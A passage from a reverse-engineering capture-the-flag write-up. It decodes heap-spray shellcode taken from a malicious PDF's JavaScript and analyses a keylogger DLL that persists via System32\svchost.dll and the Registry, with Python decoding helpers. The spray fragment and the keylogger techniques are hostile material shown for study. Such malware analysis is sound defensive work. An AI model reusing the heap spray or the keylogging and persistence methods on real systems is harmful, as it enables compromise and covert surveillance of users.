string_10 = string_2.substring(0, string_9);
string_11 = string_2.substring(0, string_2.length - string_9);
while (string_11.length + string_9 < 0x40000) string_11 = string_11 + string_11 + string_10;
string_12 = new Array();
for (var_1 = 0; var_1 < 125; var_1++) string_12[var_1] = string_11 + string_2;
```

The shellcode we need to convert is in `string_3`.

Put it in a variable to test it first: convert it to hex and inspect it before moving on to dynamic analysis:
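The conversion to hex, as an added Python example rather than code from the write-up. `unescape()` in JavaScript turns each `%uXXXX` into one UTF-16 code unit, which lands in the PDF reader's memory as two bytes with the low byte first, so `%u72f9` is `f9 72`; that byte order is what the shellcode relies on. The two short escape sequences in the script are taken from the listing above (the start of `string_3` and the sled unit); the code around them is mine.

```python
# Added example, not code from the write-up: convert the %uXXXX-escaped
# JavaScript string from the PDF into raw shellcode bytes and hex. JavaScript's
# unescape() turns each %uXXXX into one UTF-16 code unit, which the PDF reader
# stores as two bytes, low byte first, so "%u72f9" is f9 72 in memory. The two
# short escape sequences below are the start of string_3 and the sled unit
# from the listing above; the rest is my own code.
import re

# One token per match: %uXXXX, %XX, or a literal character.
TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", re.DOTALL)


def unescape_to_bytes(s: str) -> bytes:
    """Bytes the unescape()d string occupies in memory (UTF-16LE).
    %uXXXX -> 2 bytes little-endian; %XX and literal characters are single
    code units too and so also take 2 bytes (XX 00)."""
    out = bytearray()
    for m in TOKEN.finditer(s):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        elif m.group(2):
            out += int(m.group(2), 16).to_bytes(2, "little")
        else:
            out += m.group(3).encode("utf-16-le")
    return bytes(out)


def to_hex(s: str) -> str:
    """Hex form of the decoded bytes, for pasting into other tools."""
    return unescape_to_bytes(s).hex()


def sled_size(unit: str, repeats: int) -> int:
    """Bytes produced by a loop that appends unescape(unit) `repeats` times,
    e.g. the `for (var_1 = 128; var_1 >= 0; --var_1)` loop above appends
    it 129 times."""
    return len(unescape_to_bytes(unit)) * repeats


# Inputs taken from the listing: the first four code units of string_3 and
# the unit the sled loop repeats.
STRING_3_HEAD = "%u72f9%u4649%u1525%u7f0d"
SLED_UNIT = "%ub32f%u3791"

if __name__ == "__main__":
    print(to_hex(STRING_3_HEAD))      # f972494625150d7f
    print(to_hex(SLED_UNIT))          # 2fb39137
    print(sled_size(SLED_UNIT, 129))  # 516
```

Running `to_hex` over the whole `string_3` value gives the byte string to hand to the next step; `sled_size` and the `0x40000` loop bound in the script are what tell you how big each sprayed block is, which is useful when judging what the spray is aiming at.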

<figure><img src="/files/QKBBbTivQ5cv6HMzou8T" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vlwWReSCaXQuR66RPcxI" alt=""><figcaption></figcaption></figure>

Some strings are visible here:

<figure><img src="/files/esLf88CK0EVclqIljXlb" alt=""><figcaption></figcaption></figure>

There is a tool called `shellcode2exe` that turns this code into an executable file.

Save the code to another file:

<figure><img src="/files/7P1mDovTC3Swdjp9euxb" alt=""><figcaption></figcaption></figure>

And run `shellcode2exe` on it:

<figure><img src="/files/4ohWLaN8VhUtH7O76irU" alt=""><figcaption></figcaption></figure>

After this I open the result in IDA to view the assembly and see what it does:

<figure><img src="/files/8FSnSiJICdG4g6h8mbnE" alt=""><figcaption></figcaption></figure>

XOR math again: each pushed value is XORed with the previous one, so this is easy now. (You can stay fully static here: XOR the values yourself outside the debugger and decode the hex to get the flag.)

<figure><img src="/files/AO2TVA7IRZ5d5LNDlbKt" alt=""><figcaption><p>This is x86, so the byte order has to be swapped (little-endian)</p></figcaption></figure>
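The static route mentioned above, as an added Python example (not code from the write-up): pull the `push` immediates out of the IDA listing, undo the XOR chain, and pack each result little-endian so the bytes read in memory order. Two things in it are my assumptions for the demo: the exact chaining (each pushed dword XORed with the previously pushed dword, the first with 0) and the sample immediates, which are generated from a sample string rather than taken from the challenge.

```python
# Added example, not code from the write-up: decode a string that shellcode
# builds by pushing 32-bit immediates and XORing each one with the value
# before it, as the disassembly above shows. Two things here are my
# assumptions for the demo: the exact chaining (each pushed dword is XORed
# with the previous pushed dword, the first one with 0) and the sample
# immediates, which are produced from a sample string rather than taken
# from the challenge. Packing is little-endian because the target is x86.
import re
import struct

PUSH_IMM = re.compile(r"\bpush\s+(?:0x([0-9a-fA-F]+)|([0-9a-fA-F]+)h)\b")


def from_ida_listing(lines) -> list:
    """Pull push immediates out of disassembly text. Accepts both the 0x form
    and IDA's trailing-h form (e.g. 'push    0DEADBEEFh')."""
    values = []
    for line in lines:
        m = PUSH_IMM.search(line)
        if m:
            values.append(int(m.group(1) or m.group(2), 16) & 0xFFFFFFFF)
    return values


def decode_chain(pushed, seed: int = 0) -> bytes:
    """plain[i] = pushed[i] ^ pushed[i-1] (pushed[-1] = seed), each plain
    dword packed little-endian so the bytes read in memory order. The result
    is cut at the first NUL, as the C string the code passes on would be."""
    out, prev = bytearray(), seed
    for v in pushed:
        out += struct.pack("<I", (v ^ prev) & 0xFFFFFFFF)
        prev = v
    return bytes(out).split(b"\x00", 1)[0]


def encode_chain(message: bytes, seed: int = 0) -> list:
    """Inverse of decode_chain; used only to build the constructed sample."""
    padded = message + b"\x00" * (-len(message) % 4)
    out, prev = [], seed
    for (word,) in struct.iter_unpack("<I", padded):
        prev = word ^ prev
        out.append(prev)
    return out


# Constructed sample: what a listing of the pushes might look like.
SAMPLE_MESSAGE = b"constructed sample, not the challenge flag"
SAMPLE_LISTING = ["push    %08Xh" % v for v in encode_chain(SAMPLE_MESSAGE)]


def recover_sample() -> bytes:
    return decode_chain(from_ida_listing(SAMPLE_LISTING))


if __name__ == "__main__":
    for line in SAMPLE_LISTING[:3]:
        print(line)
    print(recover_sample())
```

Pushes build a string from its end, since the stack grows downward, so if the decoded text comes out as reversed groups of four characters, feed the immediates to `decode_chain` in reverse order; the chaining direction has to match whichever order the shellcode actually used.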

## Q5. Challenge 5 – 5get\_it.exe key?

It's a Windows PE32 executable again.

View it in pestudio:

<figure><img src="/files/9S61hy7eozJdjZhY0j0K" alt=""><figcaption><p>Start the research from here, then move to IDA to decompile</p></figcaption></figure>

Start at `DllMain()`:

<figure><img src="/files/nyL6NsrXMwPtvqpM7VEQ" alt=""><figcaption><p>It looks like the file copies itself to <code>C:\Windows\System32\svchost.dll</code></p></figcaption></figure>

<figure><img src="/files/nat4huETQoRgoeKWoyDA" alt=""><figcaption><p>Create a Registry entry</p></figcaption></figure>

Looking around, I move to the function sub\_10009EB0 and find a very large loop:

<figure><img src="/files/KU9F8UbjRhJKRxVmzvCq" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0SyNlafTyyBZLSuth38T" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/p4UGcR9RgeRYkQ1p8MdJ" alt=""><figcaption></figcaption></figure>

Press Space to switch to text view, which makes things easier to look up. Here I find the API `GetAsyncKeyState`, which suggests a keylogger. (Alternatively, press F5 to view the pseudocode.)

I will continue the analysis on FLARE VM.

Start from sub\_1001240(), which prints the Flare message and handles the key `m`:

<figure><img src="/files/isHok2OrQnezBu9095SU" alt=""><figcaption><p>Have a look at dword_100194FC</p></figcaption></figure>

<figure><img src="/files/dtsnOLcs13QYy1HnYDP5" alt=""><figcaption><p>Flare message</p></figcaption></figure>

Use X (cross-references) to show where dword\_100194FC is set:

<figure><img src="/files/ayp9958rooiuBdrtSqaS" alt=""><figcaption></figcaption></figure>

It is set to 0 in `_cfltcvt_init()` (note this function for later) and in sub\_10009AF0, and set to 1 in sub\_10009B60.

Let's have a look at `_cfltcvt_init()`:

```c
void _cfltcvt_init()
{
  dword_10017000 = 1;
  dword_10019460 = 0;
  dword_10019464 = 0;
  dword_10019468 = 0;
  dword_1001946C = 0;
  dword_10019470 = 0;
  dword_10019474 = 0;
  dword_10019478 = 0;
  dword_1001947C = 0;
  dword_10019480 = 0;
  dword_10019484 = 0;
  dword_10019488 = 0;
  dword_1001948C = 0;
  dword_10019490 = 0;
  dword_10019494 = 0;
  dword_10019498 = 0;
  dword_1001949C = 0;
  dword_100194A0 = 0;
  dword_100194A4 = 0;
  dword_100194A8 = 0;
  dword_100194AC = 0;
  dword_100194B0 = 0;
  dword_100194B4 = 0;
  dword_100194B8 = 0;
  dword_100194BC = 0;
  dword_100194C0 = 0;
  dword_100194C4 = 0;
  dword_100194C8 = 0;
  dword_100194CC = 0;
  dword_100194D0 = 0;
  dword_100194D4 = 0;
  dword_100194D8 = 0;
  dword_100194DC = 0;
  dword_100194E0 = 0;
  dword_100194E4 = 0;
  dword_100194E8 = 0;
  dword_100194EC = 0;
  dword_100194F0 = 0;
  dword_100194F4 = 0;
  dword_100194F8 = 0;
  dword_100194FC = 0;
  dword_10019500 = 0;
}
```

This looks like the letters of a word in sequence, so let's find where each of these is set.

Continuing: `dword_100194FC` is set by the `o` key:

<figure><img src="/files/I9Her7mFdBzDB9lUFJgJ" alt=""><figcaption></figcaption></figure>

Okay, let's check the others until we know which key sets each dword variable in \_cfltcvt\_init():

Right above it is dword\_100194F8:

<figure><img src="/files/kvRdtncxcVFicfTiCQ2e" alt=""><figcaption></figcaption></figure>

It is set to 1 by `c` in sub\_1009850:

<figure><img src="/files/8xUiBK25TT5qjiCfXY8f" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/fbtXLTGHsBJ55yVwkkLb" alt=""><figcaption><p>Next is dword_100194EC</p></figcaption></figure>

<figure><img src="/files/7mttb8yz9zYvxv4I7ti3" alt=""><figcaption><p>Set to 1 by d in sub_10009880</p></figcaption></figure>

To go faster, we can go to the function \_cfltcvt\_init and check the cross-references of each dword:

<figure><img src="/files/3gtsW5qeRT7zC0ZHSyU4" alt=""><figcaption></figcaption></figure>

After finding the key for each one, I annotate the listing and read off this message:

```c
void _cfltcvt_init()
{
  dword_10017000 = 1; 
  dword_10019460 = 0; // set by 'l' 
  dword_10019464 = 0; // set by '0' 
  dword_10019468 = 0; // set by 'g' 
  dword_1001946C = 0; // set by 'g' 
  dword_10019470 = 0; // set by 'i' 
  dword_10019474 = 0; // set by 'n' 
  dword_10019478 = 0; // set by 'g' 
  dword_1001947C = 0; // set by 'd' 
  dword_10019480 = 0; // set by 'o' 
  dword_10019484 = 0; // set by 't' 
  dword_10019488 = 0; // set by 'u' 
  dword_1001948C = 0; // set by 'r' 
  dword_10019490 = 0; // set by 'd' 
  dword_10019494 = 0; // set by 'o' 
  dword_10019498 = 0; // set by 't' 
  dword_1001949C = 0; // set by '5' 
  dword_100194A0 = 0; // set by 't' 
  dword_100194A4 = 0; // set by 'r' 
  dword_100194A8 = 0; // set by '0' 
  dword_100194AC = 0; // set by 'k' 
  dword_100194B0 = 0; // set by 'e' 
  dword_100194B4 = 0; // set by '5' 
  dword_100194B8 = 0; // set by 'a' 
  dword_100194BC = 0; // set by 't' 
  dword_100194C0 = 0; // set by 'f' 
  dword_100194C4 = 0; // set by 'l' 
  dword_100194C8 = 0; // set by 'a' 
  dword_100194CC = 0; // set by 'r' 
  dword_100194D0 = 0; // set by 'e' 
  dword_100194D4 = 0; // set by 'd' 
  dword_100194D8 = 0; // set by 'a' 
  dword_100194DC = 0; // set by 's' 
  dword_100194E0 = 0; // set by 'h' 
  dword_100194E4 = 0; // set by 'o' 
  dword_100194E8 = 0; // set by 'n' 
  dword_100194EC = 0; // set by 'd' 
  dword_100194F0 = 0; // set by 'o' 
  dword_100194F4 = 0; // set by 't' 
  dword_100194F8 = 0; // set by 'c' 
  dword_100194FC = 0; // set by 'o' 
  dword_10019500 = 0;
}
```

```c
l0ggingdoturdot5tr0ke5atflaredashondotco 
```

Translate it and we get the flag (note that the final letter `m` has to be added at the end):

<figure><img src="/files/ac2gy7dYTL6HABLeghif" alt=""><figcaption></figcaption></figure>
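The same read-off, done by script, as an added Python example rather than code from the write-up. The annotated listing is the one above; what the script assumes is that the globals are meant to be read in address order, that the trailing `m` the write-up notes is missing gets appended, and that the spelled-out `dot`, `dash` and `at` stand for `.`, `-` and `@` (the usual way these flags are spelled).

```python
# Added example, not code from the write-up: derive the typed key sequence
# from the annotated _cfltcvt_init() listing above, the way the write-up does
# by hand. The listing text is copied from the write-up; the address-order
# reading, the trailing 'm' the write-up says is missing, and the dot/dash/at
# spelling are assumptions of this script.
import re

ENTRY = re.compile(r"dword_([0-9A-Fa-f]{8})\s*=\s*0;\s*//\s*set by '(.)'")

LISTING = """
dword_10019460 = 0; // set by 'l'
dword_10019464 = 0; // set by '0'
dword_10019468 = 0; // set by 'g'
dword_1001946C = 0; // set by 'g'
dword_10019470 = 0; // set by 'i'
dword_10019474 = 0; // set by 'n'
dword_10019478 = 0; // set by 'g'
dword_1001947C = 0; // set by 'd'
dword_10019480 = 0; // set by 'o'
dword_10019484 = 0; // set by 't'
dword_10019488 = 0; // set by 'u'
dword_1001948C = 0; // set by 'r'
dword_10019490 = 0; // set by 'd'
dword_10019494 = 0; // set by 'o'
dword_10019498 = 0; // set by 't'
dword_1001949C = 0; // set by '5'
dword_100194A0 = 0; // set by 't'
dword_100194A4 = 0; // set by 'r'
dword_100194A8 = 0; // set by '0'
dword_100194AC = 0; // set by 'k'
dword_100194B0 = 0; // set by 'e'
dword_100194B4 = 0; // set by '5'
dword_100194B8 = 0; // set by 'a'
dword_100194BC = 0; // set by 't'
dword_100194C0 = 0; // set by 'f'
dword_100194C4 = 0; // set by 'l'
dword_100194C8 = 0; // set by 'a'
dword_100194CC = 0; // set by 'r'
dword_100194D0 = 0; // set by 'e'
dword_100194D4 = 0; // set by 'd'
dword_100194D8 = 0; // set by 'a'
dword_100194DC = 0; // set by 's'
dword_100194E0 = 0; // set by 'h'
dword_100194E4 = 0; // set by 'o'
dword_100194E8 = 0; // set by 'n'
dword_100194EC = 0; // set by 'd'
dword_100194F0 = 0; // set by 'o'
dword_100194F4 = 0; // set by 't'
dword_100194F8 = 0; // set by 'c'
dword_100194FC = 0; // set by 'o'
"""

# Assumed spelling of the punctuation in the e-mail style flag.
WORDS = {"dot": ".", "dash": "-", "at": "@"}


def key_sequence(listing: str) -> str:
    """Map each annotated global to its key and read them in address order,
    which is how the flag globals are laid out."""
    pairs = [(int(addr, 16), key) for addr, key in ENTRY.findall(listing)]
    pairs.sort()
    return "".join(key for _, key in pairs)


def spell_in(seq: str, words=WORDS) -> str:
    """Replace the spelled-out punctuation, in a fixed order so the result
    is deterministic."""
    for word in ("dash", "dot", "at"):
        seq = seq.replace(word, words[word])
    return seq


def recover_flag(listing: str = LISTING, tail: str = "m") -> str:
    """Key sequence in address order, plus the final key the write-up notes
    is missing from the listing, then the punctuation spelled in."""
    return spell_in(key_sequence(listing) + tail)


if __name__ == "__main__":
    print(key_sequence(LISTING))
    print(recover_flag())
```

Reading the flags in address order is what turns forty unrelated-looking globals into a string; a quick check that the sequence is right before decoding is to compare it with the raw `l0ggingdot...` line above.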

## Challenge 6 – e7bc5d2c0cf4480348f5504196561297 key?
